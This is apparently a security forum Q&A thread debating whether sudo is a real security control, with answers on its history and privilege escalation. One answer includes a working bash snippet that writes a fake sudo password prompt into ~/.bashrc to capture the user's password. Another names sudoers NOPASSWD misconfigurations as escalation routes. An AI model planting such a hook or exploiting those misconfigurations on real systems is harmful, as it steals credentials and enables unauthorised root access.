Is `sudo` almost useless?

Sudo has no real security purpose against a malicious third-party. So yes, it is basically useless for that purpose. In the past I believed it was actually a security control to prevent escalation of privilege and make attacks harder, because some people keep on insisting it also has that purpose, but that's actually false. In fact, at the moment you only got one answer to your question, and that answer is propagating that myth. The only purpose of sudo is to protect you from yourself, that is, to avoid messing up your system by mistake. Gaining all the privileges with one click or one key press might be dangerous, while sudo will at least force you to consciously type your password. And if you (or a program or script) ends up touching system files or other users' files by mistake, without consciously using sudo, you will get a "permission denied" notice. So in the end it's just an administration tool, and not actually a security control meant to protect you from an attack.

Here's a very basic example of why sudo offers no real protection against malicious code:

# Create payload: replace sudo with an alias
payload='
    fake_sudo() {
        # Simulate a sudo prompt
        echo -n "[sudo] password for ${USER}: "
        read -s password
        echo
        # Run your command so you are happy
        echo "$password" | sudo -S "$@"
        # Do my evil stuff with your password
        echo "Done with your command, now I could use $password to do what I want"
    }
    alias sudo=fake_sudo
'

# Write the payload to the bashrc config file
echo "$payload" >> ~/.bashrc

That is a very basic example of code that an attacker could run on your machine. It's not perfect, it doesn't even handle every case (it won't work well if you enter the wrong password), but it just shows you that sudo can be replaced by an attacker. If you run that script, the next time you open your terminal and run sudo you will actually be running fake_sudo. An attacker can replace your programs with aliases, or replace the binary files (putting malicious versions in ~/bin or wherever they can be executed in your path), etc.

This is not even a real "escalation of privilege", because a user that can run sudo to become root already has the all the privileges. A real unprivileged user should not have sudo capabilities. To have a real separation of privileges you should run administration stuff on a totally separate account.


I am the co-author of sudo. It was written in the early 80's specifically to address a need to protect the integrity of a shared resource (A VAX-11/750 running BSD UNIX) from its users (the faculty of the CS Department at SUNY/Buffalo). At the time, the only other option was 'su' which required everyone share a single password. Had a calamity occurred it would have been difficult or impossible to sift through the forensics and determine who the fat-fingered perpetrator was...

I think sudo's apparent lasting utility is that it reminds the command line user that they are about to do something which might merit some certainty in the outcome before typing. Granted, in some implementations, like the major raspberry pi distros, where no password is prompted for, it serves merely as a rubber stamp. So go figure.

I still believe that best practices for implementing applications under UNIX-derived operating systems dictate that you run them under a non-root ID. If you need root it should be under controlled circumstances. Think of sudo as the way root access is granted to command line users under controlled circumstances.. That's all.


No, sudo is not useless.

As a user (target)

Usually, when you're on Linux, you're acting as a non-root user. A lot of things, like installing packages with apt, need root/sudo permission to be used. The sudo binary is there to give the normal user permissions to use root level actions like apt install.

You should not be using Linux all the time as root. This is because if you're compromised, the attacker would have root access to your system, which means they can do pretty much anything on your system. Instead, you run Linux as a non-root user, so that even if your account gets compromised, the attacker can't immediately get root access.

Of course, no system is totally secure and something somewhere in your system can be exploited. Using a sudoers account instead of root is one step in securing your system, as discussed above.

If you're saying "The hacker will get in and get root anyway, why should I use sudo at all?", that's like saying "If someone gets in my house, they will be able to (somehow) get my jewellery anyway. Why should I use a safe or locks?". It's an extra layer of protection. We're not looking for "a lock that can protect everything", but "many locks to provide extra security in case a few of them break".

sudo is a safeguard. It allows you to run root-level programs only when you need to. It's so you only sometimes open the door to your TOP SECRET room instead of always leaving it open, even if having it always open (always running as root) is more convenient.

Also, when you're a legit user, you don't run privilege escalation scripts every time you wanna use a sudo action, you use sudo.

As an attacker

The sudo binary can be exploited to gain some information or even get root access. Sometimes, the user(s) may have in their sudoers file something like MY_USER ALL=(ALL) NOPASSWD: ALL, in which case, if you can get access as the user MY_USER, you can run any and all sudo/root commands without passwords. Running sudo -l may also give you information like what commands you can run as root even without a password. An example of such misconfiguration would be USERNAME ALL=(ALL) NOPASSWD: /bin/vi which allows you to run vi as root without a password as the user USERNAME. This is one way to manually escalate privileges.

Every extra program may present some extra vulnerabilities. Having tomcat running would introduce the system to tomcat exploits. sudo may just be another program you can use in your exploitation.

Also, how do you think those handy privilege escalation scripts/tools get you root access? A lot of them use sudo one way or another.

Tags:

Sudo

Privilege Escalation

Related

Does python's pip provide cryptographic authentication and integrity validation? What is the use case for using TLS on an internal network? Is single iteration SHA-256 safe enough for hashing 128bit random number API keys? Can a large corporation make a believable promise Specific character based policy for passwords Protect API from being tampered? HTTPS connection to specific sites fail with cURL on macOS Client side password hashing with static salt - did I find a breach? eBay web site tries to connect to wss://localhost:xxxxx - is this legit or they have some Malware JS running? Why is a hash sent with data secure? How do I inform a company I found a leaked database of theirs on the Internet? What does WPA2 traffic look like to a packet sniffer that is not connected to the network?

Recent Posts